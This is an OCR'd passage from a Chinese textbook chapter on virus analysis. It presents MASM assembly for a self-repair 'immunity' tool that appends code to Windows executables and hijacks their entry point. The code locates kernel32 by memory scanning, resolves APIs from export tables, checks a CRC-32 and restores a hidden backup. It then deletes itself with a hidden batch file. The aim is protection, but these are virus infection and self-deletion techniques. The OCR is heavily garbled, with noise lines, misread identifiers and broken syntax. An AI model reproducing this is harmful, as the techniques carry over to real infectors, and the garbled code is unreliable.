szCaption db "谢谢 使 用 免疫 代码 程序 .0 

szTextl db ' 该 程序 已 经 被 加 过 免疫 代码 .0dh.0ah.' 程 序 设 计 : 升 达 \ 
经 贸 管理 学 院 资讯 系 RRF, 0 

ssl 1 db 256 dup(0) 

Save pl db 'c:\, 245 dup(0) :备份 的 路 径 ， 在 此 目录 下 实现 隐藏 
Do 
: 公用 模块 ，_GetKemel.asm 

; 根据 程序 被 调用 的 时 候 堆栈 中 有 个 用 于 Ret 的 地 址 指向 Kernel32.dll 
; 而 从 内 存 中 扫描 并 获取 Kemel32.dll 的 基 址 
:৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯ 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
; 如 果 错 误 ， 调 用 Handler， 安 全 退出 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
_SEHHandler proc  _lpExceptionRecord, 

_IpSEH, 

_lpContext, 

_lpDispatcherContext 

pushad 

mov esi lpExceptionRecord 

mov edi, lpContext 

assume esi: ptr EXCEPTION RECORD. edi: ptr CONTEXT 

mov eax. _IpSEH 

push [eax + Och] 

pop [edi].regEbp 

push [eax + 8] 

pop [edi] regEip 

push eax 

pop [edi] regEsp 

assume  esi:nothing.edi:nothing 
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popad 
mov eax, ExceptionContinueExecution 
ret 
 SEHHandler endp 
— UA 
: 在 内 存 中 扫描 Kemel32.dll 的 基 址 
— n rg AUI— VII 
 GetKemelBase proc dwKernelRet 
local (üdwRetum 
pushad 
mov (QdwRetum, 0 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
; 重 定位 
কেকককককককককফককককককককককককককককককককককককককককককককককককককককককককককক 
call @F 
pop ebx 


sub ebx, offset @B 


Xoolokoolokolokokokoolokolokololokooloelokoolollokololokoololelokoooololololokookoelokooloolokollee 


; 创建 用 于 错误 处 理 的 SEH 结构 

কেসকককককক কক কক ককককককককককককককককককককককককককককককককককককককককককককক কক 
assume fs:nothing 

push ebp 

lea eax, [ebx + offset PageError] 

push eax 

lea eax, [ebx + offset SEHHandler] 

push eax 

push fs:[0] 

mov  fs[0]. esp 


কেককসকসংসংক সক ক সক ক কক কক সক কসকক কক কক কক ক কক কক ক কক ক কক কংস কক কক কক কক. ক কক ক কক 


: 查找 Kemel32.dll 的 基地 址 

এককক কক ক কক ক কফ ক ক ক কক ক ক ক ক ক ক. কক কক ক ক কফ কক ক ক ক ক ক ক কক কক ক + ক কক ক. ক ক ক ক ক কক কক কক ক 
mov edi, _dwKemelRet 

and edi, Offff0000h 

while TRUE 

Jf word ptr [edi] 一 IMAGE DOS SIGNATURE 

mov esi, edi 

add esi, [esi+003ch] 

if wordptr [esi] — IMAGE NT SIGNATURE 

mov @dwRetum, edi 
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sub edi.010000h 

-break Af edi < 070000000h 
.endw 

pop fs:[0] 

add esp, Och 

popad 

mov eax, @dwRetum 

ret 


_GetKemelBase endp 
:৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯ 


; 从 内 存 中 模块 的 导出 表 中 获取 某 个 API 的 入 口 地 址 


১ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 


_GetApi proc _hModule, IpszApi 
local @dwRetum.@dwStringLength 
pushad 


mov @dwRetum,0 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 重 定位 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক কক 
call @F 

pop ebx 

Sub ebx, offset @B 


কেকক ক ফকসক ক সংক কক ক কক কক ফক কক সক কক কক কক কক কক কক EEE EEEE ক. কফ কক কক কক কক কক ক কক 


; 创建 用 于 错误 处 理 的 SEH 结构 
সসকককফসককসফসককফসকসসককসকফসকফসবসসসকসসকসফকসফিফফক 
assume fs:nothing 

push ebp 

lea eax, [ebx + offset Error] 

push eax 

lea eax, [ebx + offset SEHHandler] 

push eax 

push fs:[0] 

mov fs:[0]. esp 


কেফফক কক কক কক ক ক কক ক কককক কক কক ক কক ক ককককক কক ক কক কক ক কক ক কক কক কৰক কক ক কক কক 


: 计算 API 字符 串 的 长 度 ( 带 尾 部 的 0) 
কেকফককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov edi, —lpszApi 

mov ecx, -1 

xor al. al 

cld 

repnz scasb 

mov ecx, edi 


sub ecx,  lpszApi 
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mov @dwStringLength, ecx 
Red 
; 从 PE 文件 头 的 数据 目录 获取 导出 表 地 址 
etaaaaasakakanapatikanaqaqanattstaaaqanataktakakkakaqataka 
mov esi, hModule 

add esi [esi+3ch] 

assume esi: ptr IMAGE NT HEADERS 

mov esi, [esi].OptionalHeader.DataDirectory.VirtualAddress 

add esi —hModule 

assume esi ptr IMAGE EXPORT DIRECTORY 


কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 查找 符合 名 称 的 导出 函数 名 
কেসকককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov ebx, [esi].AddressOfNames 

add ebx,  hModule 

Xor edx, edx 

repeat 

push esi 

mov edi [ebx] 

add edi,  hModule 

mov esi  lpszApi 

mov ecx, (dwStringLength 

repz cmpsb 

if ZERO? 

pop esi 

jmp @F 

„endif 

pop esi 

add ebx, 4 

inc edx 

until edx >= [esi]. NumberOfNames 
jmp _Error 

@@: 
কেকফককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
:API 名 称 索引 一 序号 索引 一 地 址 索引 
কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
sub ebx, [esi].AddressOfNames 

sub ebx,  hModule 

shr ebx 1 

add ebx, [esi].AddressOfNameOrdinals 
add ebx,  hModule 

movzx eax, word ptr[ebx] 

shl eax, 2 

add eax, [esi].AddressOfFunctions 


第 3 章 ， 病 毒 分 析 * 135 ° 


add eax,  hModule 


কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 从 地 址 表 得 到 导出 函数 地 址 


কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov eax, [eax] 

add eax,  hModule 

mov @dwRetum, eax 


 Emor: 

pop fs:[0] 

add esp, Och 

assume esi: nothing 

popad 

mov eax.@dwRetum 

ret 

_GetApi endp 

_CreateFile _ApiCreateFile ? 
_ReadFile _ApiReadFile ? 
 WriteFile . ApiWriteFile ? 
. SetFilePointer . ApiSetFilePointer ? 
. CloseHandle . ApiCloseHandle ? 
. DeleteFile . ApiDeleteFile ? 
. CopyFile  ApiCopyFile ? 
 GetFileSize  ApiGetFileSize ? 
. GlobalAlloc . ApiGlobalAlloc ? 
. GlobalFree . ApiGlobalFree ? 
. GetModuleHandle  ApiGetModuleHandle ? 
. GetModuleFileName  ApiGetModuleFileName — ? 
. RtlZeroMemory  ApiRtlZeroMemory ? 
 ExitProcess  ApiExitProcess ? 
_lstrcpy _Apilstrcpy ? 
_lstrcat _Apilstrcat ? 
_lstrcpyn _Apilstrcpyn ? 
_lstrlen _Apilstrlen ? 
_ShellExecute _ApiShellExecute ? 
_wsprintf _Apiwsprintf ? 
szCreateFile db 'CreateFileA'.0 

szReadFile db 'ReadFile',0 

szWriteFile db 'WriteFile'.0 
szSetFilePointer db 'SetFilePointer.0 
szCloseHandle db 'CloseHandle'.0 

szDeleteFile db 'DeleteFileA'.0 

szCopyFile db 'CopyFileA'.0 

szGlobalAlloc db 'GlobalAlloc'.0 

szGlobalFree db  'GlobalFree'.0 
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szGetFileSize db 'GetFileSize'.0 
szExitProcess db 'ExitProcess',0 
szGetModuleHandle db 'GetModuleHandleA'.0 
szGetModuleFileName db 'GetModuleFileNameA'.0 
szRtlZeroMemory db 'RtlZeroMemory'.0 
szlstrcpy 00119000540 

szlstrcat db 'lstrcatA'0 

szlstrcpyn db 'lstrcpynA'.0 

szlstrlen db 'IstrlenA',0 
szShellExecute db  'ShellExecuteA' 0 
szwsprintf db — 'wsprintfA' 0 


কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 此 处 的 计算 校 验 值 函 数 与 加 工 免疫 代码 时 计算 校 验 值 的 函数 有 区 别 。 
: 函数 功能 : 计算 文件 的 CRC-32， 但 不 包括 偏 移 位 置 为 Crc32_offset 
; 处 的 4 个 字 节 。Crc32_offset 为 文件 中 有 4 字 节 不 参与 校 验 ， 它 在 
; 文件 中 偏 移 。 方 法 为 : 将 整个 文件 读 到 内 存 ， 然 后 将 Crc32 offset 
; 处 的 4 个 字 节 之 后 的 数据 整体 前 移 4 个 字 节 ， 然 后 计算 文件 长 度 -4 
; 个 字 节 的 校 验 值 。 
; 为 什么 这 4 字 节 不 参加 校 验 : 这 4 个 字 节 是 要 存放 其 余部 分 计算 得 
; 到 的 校 验 值 。 
কেসকককককক কক কক ককককককককককককককককককককককককককককককককককককককককককককককক 
Get File Crc32 proc — Crc32 offse:DWORD 

Local crc32tbl[256]:DWORD :CRC32 表 

Local file name[256]:byte 

Local handle fDWORD :文件 句柄 

Local len 1:DWORD :文件 长 度 

local crc lenl:DWORD 

Local pData:-DWORD ;内 存 指针 

Local @temp1:DWORD 
pushad 

:动态 生成 CRC-32 表 到 crc32tbl 
mov ecx,256 ; repeat for every DWORD in table 

$BigLoop: 


lea eax, [ecx-1] 


mov ecx, 8 
$SmallLoop: 

shr eax， 1 
jec @F 

Xor  eax, 0EDB88320h 
à: 
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mov [crc32tbHecx*4-4], eax 
dec ecx 
jne $BigLoop 
:获取 当前 文件 名 到 file name 
invoke [ebx+ GetModuleHandle]. NULL 
mov handle feax 
invoke [ebx+ GetModuleFileName]. handle f. addr file name, 256 
:打开 本 进程 对 应 的 文件 
invoke [ebx+ CreateFile]. addr file name, GENERIC READ, NULL, 
NULL, OPEN EXISTING, 0, NULL 
mov handle f. eax 
Af eax— INVALID HANDLE VALUE 
; szText read em," E citi" 
‘lea ecx, [ebx+read err] 
:invoke [ebx+ MessageBox].0.ADDR file name.ecx. MB OK 
jmp $Done 
endif 
: 取 文 件 大 小 ， 为 0 则 退出 
invoke [ebx+ GetFileSize], handle f. ADDR crc lenl 
mov len 1, eax 


Af eax 一 0 
jmp $Done 
endif 


:分 配 len 1 大 小 的 内 存 
invoke [ebx+ GlobalAlloc], GPTR. len 1 
mov pData, eax 
if eax — NULL 
;szText mem _er," 读 自己 错误 "将 自己 读 到 内 存 
:lea ecx, [ebx+mem err] 
‘invoke [ebx+ MessageBox].0.ecx.ADDR file name,MB_OK 
jmp $Done 
endif 
: 读 文件 到 内 存 
invoke [ebx+ ReadFile], handle f.pDatalen 1, ADDR @templ, NULL 
:关闭 句柄 
invoke [ebx+ CloseHandle]. handle f 
:忽略 放 校 验 值 的 4 个 字 节 位 置 ， 后 面 数据 往 前 移动 4 个 字 节 数 据 ( 放 
: 校 验 值 位 置 不 参加 校 验 ) 
mov edi. pData 
add edi, Crc32 offset 
mov esi, edi 
add esi, 4 
mov ecx, len 1 
sub ecx, Crc32 offset 


শনির 
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sub ecx 4 

:szText forsl, "ecx=%d, %d, %d" 

:lea edx, [ebx+fors1] 

invoke [ebx+ wsprintf], ADDR file name, edx, ecx, len_1, Crc32 offset 

;invoke [ebx+ MessageBox]. 0. ADDR file name. NULL.MB OK 

cld 

rep movsb 

:设置 校 验 参数 

:计算 CRC-32， 采 用 的 是 把 整个 字符 串 当 作 一 个 数组 ， 然 后 把 这 
:个 数组 的 首 地 址 赋值 给 EBX, 

:把 数组 的 长 度 赋值 给 ECX， 然 后 循环 计算 ， 返 回 值 (计算 出 来 的 
;CRC-32 值 ) 储 存在 EAX 中 : 

:EBX = 校 验 数据 首 地 址 

:ECX = 参与 校 验 的 字 节 数 

push ebx :下 面 要 使 用 ebx， 需 保护 

mov ecx, len 1 

sub ecx, এ : 减 去 不 参加 校 验 的 4 个 字 节 

mov ebx, pData 

mov eax, -1 ; 先 初始 化 eax 

Or ecx, ecx 

jz $Done :如果 表 为 空 ， 就 bye bye 

or ebx, ebx 


jz $Done ; 避免 出 现 空 指针 


mov dL [ebx] 
xo dl al 
movzx edx, dl 


shr eax, 8 
xor eax, [crc32tbl+edx*4] 
inc ebx 
dec ecx 
jne @B 
not eax 
$Done: 
pop ebx 


mov @templ, eax :暂时 保存 校 验 值 

invoke [ebx+ GlobalFree]. pData :该 函数 会 影响 eax 
popad 

mov eax, @templ 

ret 


Get File Crc32 endp 
:修复 函数 
resume exe proc 

Local file name[256]: byte 
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Local handle f DWORD 

local temp: DWORD 

local pData: DWORD 

local peH: IMAGE NT HEADERS 

local dosH: IMAGE DOS HEADER 

local secH: IMAGE SECTION HEADER 

pushad 

jmp Gf 

25] db "c^mend.exe".0 

@@: 

invoke [ebx+ GetModuleHandle]. NULL 

mov handle f. eax 

invoke [ebx+ GetModuleFileName], handle f. addr file name, 256 
invoke [ebx+ CreateFile], addr file name, GENERIC READ, 
0. NULL, OPEN EXISTING, 0. NULL 

mov handle f. eax 

invoke [ebx+ ReadFile] handle f addr 00517, sizeof 
IMAGE DOS HEADER,ADDR temp.NULL 

invoke [ebx+ SetFilePointer], handle f. dosH.e lfanew, NULL.FILE BEGIN 
invoke [ebx+ ReadFile], handle f, addr peH, sizeof 
IMAGE NT HEADERS, ADDR temp, NULL 

movzx eax, peH.FileHeader.NumberOfSections 

dec eax 

mov ecx, sizeof IMAGE SECTION HEADER 

mul cx 

mov ecx, eax 

add ecx, sizeof IMAGE NT HEADERS 

add ecx, dosH.e lfanew 

invoke [ebx+ SetFilePointer], handle f, ecx, NULL, FILE BEGIN 
invoke [ebx+ ReadFile], handle f, addr secH, sizeof 
IMAGE SECTION HEADER. ADDR temp. NULL 

mov ecx, secH.PointerToRawData 

add ecx, secH.Misc.VirtualSize 

:szText fhg, "offset=%X" 

lea edx, [ebx+fhg] 

:invoke [ebx+ wsprintf], ADDR file name, edx, ecx 

:invoke [ebx+ MessageBox]. 0. ADDR file name. ADDR file name. 
:MB OK 

:定位 到 存放 修复 程序 的 地 方 

invoke [ebx+ SetFilePointer]. handle f. ecx. NULL. FILE BEGIN 
invoke [ebx+ GlobalAlloc]. GPTR. 3072 

mov pData, eax 

invoke [ebx+ ReadFile]. handle f. pData, 3072, ADDR temp. NULL 
“if eax = 0 
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; lea esi, [ebx+zs]] 

: invoke [ebx+ MessageBox].0. esi, esi. MB OK 

„endif 

invoke [ebx+ CloseHandle]. handle f 

lea edi, [ebx+zs1] 

invoke [ebx+ CreateFile]. edi. GENERIC WRITE, 0. NULL, 
CREATE ALWAYS,0,NULL FILE SHARE READ 

mov handle f eax 

invoke [ebx+ WriteFile], handle f. pData, 3072. ADDR temp. NULL 

invoke [ebx+ CloseHandle] handle f 

invoke [ebx+ GlobalFree]. pData 

invoke [ebx+ RtlZeroMemory]. addr file name. 256 

invoke [ebx- GetModuleHandle]. NULL 

mov handle f. eax 

invoke [ebx* GetModuleFileName], handle f addr file name, 256 

:参数 必须 附加 在 修复 程序 后 面 

invoke [ebx+ ShellExecute], 0, NULL, edi, addr file name, 
NULL, SW HIDE 

popad 

ret 
resume exe endp 


Ldolokokokokokololotokokelokotokoololololololaolokololoololoololkool কক কক কক কফ কক কক কক কক কক ক কক কক 


; 被 保护 文件 新 的 入 口 地 址 


Hokololkokolokololokotokoolaetolololoooloolokooloelolololokooloelolkooleolokoolokookoeoleolololololelole 


. NewEntry: 


কেকক ক ক লংসংক ক কক ক ক কংসক কক কক কককক কক কক ক কক. ক ক কক কক কক ক কক কক. ক কক ক কক কক ক কক কক কক 


; 重 定位 并 获取 一 些 API 的 入 口 地址 
কসককসসককসফসককফসককসফকসককসকফসককফসসকককসককসকসকসফক 
call @F 

@@: 

pop ebx 

sub ebx, offset @B 

এককক ক কফ কক ক কফ ক ক কক ক ক ক ক ক ক ক কক ক ক ক ক ক ক কক কক ক ক ক ক কক. কক ক ক ক ক ক ক ক ক ক ক ক ক কক ক কক 
invoke ^ GetKernelBase, [esp] :获取 Kemel32.dll 基 址 

Jf 1eaX 

jmp _ToOldEntry 

„endif 

mov [ebx+hDIIKernel32]. eax 

lea eax, [ebx+szGetProcAddress] 

invoke _GetApi, [ebx+hDIIKernel32].eax :获取 GetProcAddress AH 
Af  !eax 

jmp _ToOldEntry 

„endif 

mov [ebx+_GetProcAddress], eax 
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কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
lea eax, [ebx+szLoadLibrary] :获取 LoadLibrary 入 口 
invoke [ebx+ GetProcAddress].[ebx+hDIIKernel32]. eax 
mov [ebx+ LoadLibrary]. eax 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
lea eax, [ebx+szKemel32] :获取 LoadLibrary A O 
invoke [ebx+_LoadLibrary], eax :用 LoadLibrary 调 kernel32.dll 
mov [ebx+hDIIKemel32], eax :得 到 kernel32.dll 的 内 存 句柄 
;调用 GetProcAddress 获取 CreateFile 地 址 

lea eax, [ebx+szCreateFile] 

invoke [ebx+ GetProcAddress] [ebx+hDIIKernel32]. eax 
mov [ebx+ CreateFile]. eax 

:调用 GetProcAddress 获取 ReadFile 地 址 

lea eax, [ebx+szReadFile] 

invoke [ebx-- GetProcAddress]. [ebx+hDIIKemel32]. eax 
mov [ebx+ ReadFile], eax 

:调用 GetProcAddress 获取 WriteFile 地 址 

lea eax, [ebx+szWriteFile] 

invoke [ebx+ GetProcAddress], [ebx+hDIIKemel32]， eax 
mov [ebx* WriteFile]. eax 

:调用 GetProcAddress 获取 SetFilePointer 地 址 

lea eax, [ebx+szSetFilePointer] 

invoke [ebx-- GetProcAddress], [ebx+hDIIKemel32], eax 
mov [ebx+ SetFilePointer], eax 

:调用 GetProcAddress 获取 CloseHandle 地 址 

lea eax, [ebx+szCloseHandle] 

invoke [ebx+ GetProcAddress]. [ebx--hDIIKemrnel32]. eax 
mov [ebx+ CloseHandle]. eax 

:调用 GetProcAddress 获取 DeleteFile 地 址 

lea eax, [ebx+szDeleteFile] 

invoke [ebx+ GetProcAddress]. [ebx+hDIIKemel32]. eax 
mov [ebx+ DeleteFile]. eax 

:调用 GetProcAddress 获取 CopyFile 地 址 

lea eax, [ebx+szCopyFile] 

invoke [ebx+_GetProcAddress]. [ebx+hDIIKernel32]. eax 
mov [ebx+_CopyFile]. eax 

:调用 GetProcAddress 获取 GetFileSize 地 址 

lea eax, [ebx*szGetFileSize] 

invoke [ebx+ GetProcAddress]. [ebx+hDIIKemel32]. eax 
mov [ebx+ GetFileSize]. eax 

:调用 GetProcAddress 获取 GlobalAlloc 地 址 

lea eax, [ebx+szGlobalAlloc] 

invoke [ebx+_GetProcAddress], [ebx+hDIIKemel32]， eax 
mov [ebx+ GlobalAlloc]. eax 
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:调用 GetProcAddress 获取 GlobalFree 地 址 

lea eax, [ebx*szGlobalFree] 

invoke [ebx+ GetProcAddress]. [ebx-hDlIKernel32]. eax 
mov [ebx+ GlobalFree]. eax 

:调用 GetProcAddress 获取 ExitProcess 地 址 

lea eax, [ebx+szExitProcess] 

invoke [ebx+ GetProcAddress]. [ebx+hDIIKernel32]. eax 
mov [ebx+ ExitProcess]. eax 

:调用 GetProcAddress 获取 GetModuleHandle 地 址 

lea eax, [ebx*szGetModuleHandle] 

invoke [ebx+ GetProcAddress]. [ebx-hDlIKernel32]. eax 
mov [ebx+ GetModuleHandle]. eax 

:调用 GetProcAddress 获取 GetModuleFileName 地 址 

lea eax, [ebx*szGetModuleFileName] 

invoke [ebx+_GetProcAddress], [ebx+hDIIKemel32]. eax 
mov [ebx+_GetModuleFileName], eax 

:调用 GetProcAddress 获取 RtlZeroMemory 地 址 

lea eax, [ebx*szRtlZeroMemory] 

invoke [ebx-- GetProcAddress], [ebx+hDIIKemel32]， eax 
mov [ebx+_RtlZeroMemory], eax 

:调用 GetProcAddress 获取 lstrcpy 地 址 

lea eax, [ebx+szlstrcpy] 

invoke [ebx-- GetProcAddress], [ebx+hDIIKemel32], eax 
mov [ebx+ lstropy]. eax 

;调用 GetProcAddress 获取 Istrcat 地 址 

lea eax, [ebx+szlstrcat] 

invoke [ebx+ GetProcAddress]. [ebx--hDIIKemel32]. eax 
mov [ebx+ lstrcat]. eax 

:调用 GetProcAddress 获取 lstrcpyn 地 址 

lea eax, [ebx+szlstrcpyn] 

invoke [ebx+ GetProcAddress].[ebx+hDIIKernel32].eax 
mov [ebx+ lstrcpyn]. eax 

:调用 GetProcAddress 获取 Istrlen 地 址 

lea eax, [ebx+szlstrlen] 

invoke [ebx+_GetProcAddress]. [ebx+hDIIKemel32]. eax 
mov [ebx+ lstrlen], eax 

:调用 GetProcAddress 获取 ShellExecute 地 址 

lea eax, [ebx+szShell32] :获取 Shell32.dll 基 址 

invoke [ebx+ LoadLibrary]. eax 

mov [ebx+hDIIShell32]. eax 

lea eax, [ebx+szShellExecute] 

invoke [ebx+_ GetProcAddress]. [ebx+hDllShell32]. eax 
mov [ebx+ ShellExecute]. eax 

lea eax, [ebx+szUser32] :获取 User32.dll 基 址 
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invoke [ebx+ LoadLibrary]. eax 

mov  [ebx-hDIIUser32]. eax 

lea  eax.[ebx*szMessageBox] :获取 MessageBox A O 
invoke [ebx+ GetProcAddress], [ebx--hDIIUser32], eax 
mov [ebx+ MessageBox]. eax 

lea  eax,[ebx*szwsprintf] :获取 wsprintf 入 口 

invoke [ebx+ GetProcAddress], [ebx--hDIIUser32], eax 
mov [ebx+ wsprintf], eax 

push [ebx+crc file offset] 

call Get File Crc32 

mov edx, eax 

cmp dword ptr[ebx*crc old]. eax 


jz Next do 

:如 果 程 序 校 验 值 已 经 变化 ， 执 行 下 面 代码 

jmp Qf 

Iknow db “检测 到 校 验 值 不 相等 ，".0dh.0ah." 将 自我 修复 ".0 
Ito db "程序 已 经 被 修改 ",0 

@@: 


lea ecx, [ebx-I know] 

lea edi, [ebx-I too] 

invoke [ebx+ MessageBox], 0. ecx, edi. MB OK 
:释放 保存 的 修复 程序 ， 文 件 名 随机 生成 

:调用 修复 程序 

;自我 退出 

call resume exe 

invoke [ebx+ ExitProcess].0 
;如果 校 验 值 没有 变化 

Next_do: 
চকেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
:检查 是 否 备份 

lea edi, [ebx*ssl 1] 

invoke [ebx+ RtlZeroMemory]. edi, 256 

invoke [ebx* GetModuleHandle]. NULL 

invoke [ebx* GetModuleFileName], eax, edi, 256 
invoke [ebx+ Istrlen], edi 

mov esi eax 

dec esi 

add esi, edi 

while byte ptr[esi] !- 'Y 

dec esi 

.endw 

inc esi 

lea ecx, [ebx+Save pl] :竟然 不 能 用 Istrcpy 
‘While byte ptr[ecx] != 0 
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inc ecx 
-endw 
‘While byte ptr [esi] != 0 
mov al [esi] 
mov [ecx] al 
inc ecx 
inc esi 
.endw 
lea ecx, [ebx+Save pl] 
:进行 备份 
‘invoke [ebx+ MessageBox]. 0, ecx, edi. MB OK 
invoke [ebx* CopyFile], edi, ecx, FALSE A FALSE, if 


lea ecx, [ebx+szText1] 
lea eax, [ebx+szCaption] 
invoke [ebx+_MessageBox], NULL, ecx, eax, MB_OK 


কেককককককক কক কক কককক কক কক কককক কককককক কক কককককককককককক কককককককক কককককক কক 


; 跳 转 到 被 保护 程序 原来 的 入 口 地 址 执行 
sss 
. ToOldEntry: 

db  Oe9h :0e9h 是 jmp xxxxxxxx 的 机 器 吗 

_dwOldEntry dd ”31323334H: 用 来 填 入 原来 的 入 口 地 址 


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 


APPEND CODE END equ this byte 


(7) 修复 程序 文件 


proto 


; 原 程序 释放 出 来 可 执行 文件 
文件 名 : mend.asm 
赵 树 升 ，2011 年 8 月 20 日 
使 用 子 程序 占用 的 空间 较 少 


SH 
.386 
model flat, stdcall 

option casemap :none `: case sensitive 


MendOld proto :修复 ， 用 备用 文件 覆盖 被 感染 的 文件 ， 然 后 执行 它 


:修复 后 的 自我 删除 
include Wmnasm32 include windows.inc 
include Wmnasm32 include user32.inc 
include Wmasm32 include kernel32 inc 
include Wmasm32 include shell32.inc 
includelib Wmasm32 lib user32.lib 


includelib ৩0085003200) kernel32.lib 


DelMyself 


第 3 章 ， 病 毒 分 析 


includelib \masm32\lib\shell32 lib 


data 

CommandLine dd0 
.Code 

Start: 

invoke GetCommandLine 
mov CommandLine. eax 
invoke MendOld 

invoke DelMyself 
invoke ExitProcess, eax 


MendOld proc uses ebx ecx edx esi edi 
LOCAL  fName[256]: BYTE 
LOCAL  fChar[256] BYTE 
LOCAL posl I:DWORD 
LOCAL len DWORD 
jmp Qf 
cPath db "c:\",0 
@@: 
invoke RtlZeroMemory, ADDR Char. 256 
invoke RtlZeroMemory, ADDR fName, 256 
invoke lstrlen, CommandLine 
mov len, eax 
invoke RtlMoveMemory, ADDR fName, CommandL ine, len 
lea ebx, fName 
inc ebx 
.While byte ptr[ebx]!=' ' && byte ptr[ebx]!=0 
inc ebx 
.endw 
inc ebx 
mov posl l.ebx Posl 1 为 参数 所 在 文件 名 
invoke Istrcpy. ADDR fChar, ADDR cPath 
invoke MessageBox.0. ADDR fChar, ebx, MB OK 
invoke lstrlen, pos] 1 
mov ebx,eax 
sub ebx.3 
add ebx, posl 1 
-while 1 
‘break if byte 001০৮] 
dec ebx 
.endw 
inc ebx 
invoke lstrcat, ADDR fChar, ebx 
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:循环 ， 一 直到 删除 母 文件 
xor ebx, ebx 
-While ebx 一 0 
invoke DeleteFile, posl 1 
:循环 ， 删 除 原来 的 程序 。 只 有 在 原来 程序 退出 后 才能 被 删除 
mov ebx, eax :竟然 必须 ， 不 能 直接 用 函数 DeleteFile 返回 值 eax 
.endw 
; 拷贝 并 用 备份 覆盖 被 保护 程序 
invoke MessageBox.0. pos] l. ADDR fChar, MB OK 
invoke CopyFile, ADDR  fChar, posl 1.FALSE 
„if eax 一 0 
; invoke MessageBox.0 .ADDR 01091, pos]. 1, MB OK. 
„endif 
invoke ShellExecute,0,NULL,ADDR fChar.NULL.NULL,SW_SHOW 
; 执行 被 保护 程序 


Tet 


MendOld endp 


:实现 自我 删除 ， 生 成 一 个 批 处 理 文件 并 执行 

DelMyself proc uses ebx ecx edx esi edi 
Local file name[256]: byte 
Local info[1024]:byte 
LOCAL fpos:DWORD, temp:DWORD 
Local file handle: DWORD 
invoke RtlZeroMemory, ADDR file name, 256 
invoke RtlZeroMemory, ADDR info, 1024 
jmp @f 
asl db "Repeat" Odh.Oah,"del ".0 
as2 db Odh.Oah,"if exist ".22h.0 
as3 db 22h." goto Repeat" Odh.0ah,"del c:\anyexe.bat",0 
as4 db "c^anyexe.bat".0 
@@: 
:建立 c:\anyexe.bat, 内 容 如 下 
Repeat 
:del C:\MASM32\EXAMPLE1SDFRAMES\MEND.EXE 
iif exist "C:MASM32\EXAMPLE1\3DFRAMES\MEND.EXE" goto Repeat 
:del c:\anyexe.bat 
invoke GetModuleHandle.NULL 
mov file handle.eax 
invoke GetModuleFileName .file handle, addr file name.256 
invoke 15105, ADDR info, ADDR asl 
invoke lstrcat ADDR info. ADDR file name 
invoke lstrcat ADDR info. ADDR as2 
invoke Istrcat, ADDR info.ADDR file name 
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invoke lstrcat ADDR info.ADDR 853 
:建立 anyexe bat 
invoke CreateFile, ADDR as4.GENERIC_WRITE, FILE SHARE READ, 
NULL, CREATE ALWAYS. 0,0 
mov file handle, eax 
if eax— INVALID HANDLE VALUE 
ret 
endif 
invoke lstrlen, addr info 
mov pos, eax 
invoke WriteFile. file handle, ADDR info, pos, ADDR temp.NULL 
invoke CloseHandle, file handle 
:执行 canyexe.bat 
invoke ShellExecute.ONULL.ADDR as4.NULL.NULL.SW_HIDE 
Tet 
DelMyself endp 
end start 


备份 在 什么 地 方 呢 ?可 以 在 回收 站 里 ， 也 可 以 像 软件 还 原 方式 一 样 ， 在 硬盘 里 开辟 一 
块 空间 来 存储 备份 。 可 以 尝试 用 函数 MoveFile 将 一 个 文件 送 到 回收 站 去 , 这 样 在 资源 管理 
器 下 就 不 能 看 到 它 了 。 移 动 之 前 也 可 以 对 文件 进行 加 密 ， 使 病毒 无 法 识别 它 是 一 个 标准 的 
PE 文件 。 

修复 程序 代码 生成 exe 文件 后 ,可 由 Masm32 目录 下 的 BINTODB.EXE 工具 将 文件 生 
成 字符 模式 ， 如 图 3-26 所 示 ， 把 它 复制 到 免疫 工具 代码 中 即 可 。 


MASM32 db Convert 


; D:、 《病毒 与 软件 安全 》 书 \ 顶 目 _ 3 nend.exe 3872 bytes 


db ?77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0 


db 14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104 
db 185,115,32,112,114,111,103,114,97,109,32,99,97,118, 


图 3-26 格式 转换 


3.4.3 自 免疫 防 病毒 演示 


免疫 工具 代码 生成 xmu.exe, 执行 并 选择 一 个 需 加 免疫 的 文件 3DFRAMES.EXE, 添加 
代码 后 显示 的 信息 如 图 3-27 所 示 。 添 加 免疫 代码 后 程序 运行 结果 如 图 3-28 所 示 。 

用 VC++ 以 二 进 制 方式 打开 该 文件 ， 对 文件 进行 修改 ， 但 要 保证 修改 后 它 还 能 执行 ， 
就 像 病 毒 一 样 ， 来 模拟 病毒 感染 ， 修 改 后 运行 的 结果 如 图 3-29 所 示 ， 显 示 校 验 值 变 了 ， 程 
序 会 自我 恢复 。 如 果 备 份 被 修改 过 的 程序 ， 在 程序 完成 自我 恢复 后 ， 再 以 二 进 制 分 别 打开 
